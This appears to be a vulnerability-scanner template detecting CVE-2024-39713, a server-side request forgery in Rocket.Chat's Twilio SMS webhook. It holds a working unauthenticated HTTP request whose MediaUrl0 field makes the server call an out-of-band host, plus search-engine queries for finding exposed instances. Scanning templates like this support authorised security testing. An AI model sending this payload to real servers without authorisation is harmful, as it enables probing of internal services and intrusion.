id: CVE-2024-39713

info:
  name: Rocket.Chat - Server-Side Request Forgery (SSRF)
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests, potentially accessing internal services.
  remediation: |
    Update Rocket.Chat to version 6.10.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39713
    - https://hackerone.com/reports/1886954
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-39713
    cwe-id: CWE-918
    epss-score: 0.90057
    epss-percentile: 0.99602
    cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
  metadata:
    vendor: rocket.chat
    product: rocket.chat
    shodan-query: http.title:"rocket.chat"
    fofa-query: title="rocket.chat"
    google-query: intitle:"rocket.chat"
  tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat,vkev,vuln

http:
  - raw:
      - |
        POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "From": "5551123456782",
          "To": "5551987654323",
          "Body": "SMS message",
          "NumMedia": 1,
          "MediaUrl0":"http://{{interactsh-url}}",
          "MediaContentType0":"application/json"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ""

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 490a004630440220687b84caa8b9e5a35c5d7ab90daae623cdcbca106577fd0cedce29245ca11fa2022023242cc18406972797a431a0bcc87efd8bbf79726cf045cf31f889cca9f9a477:922c64590222798bb761d5b6d8e72950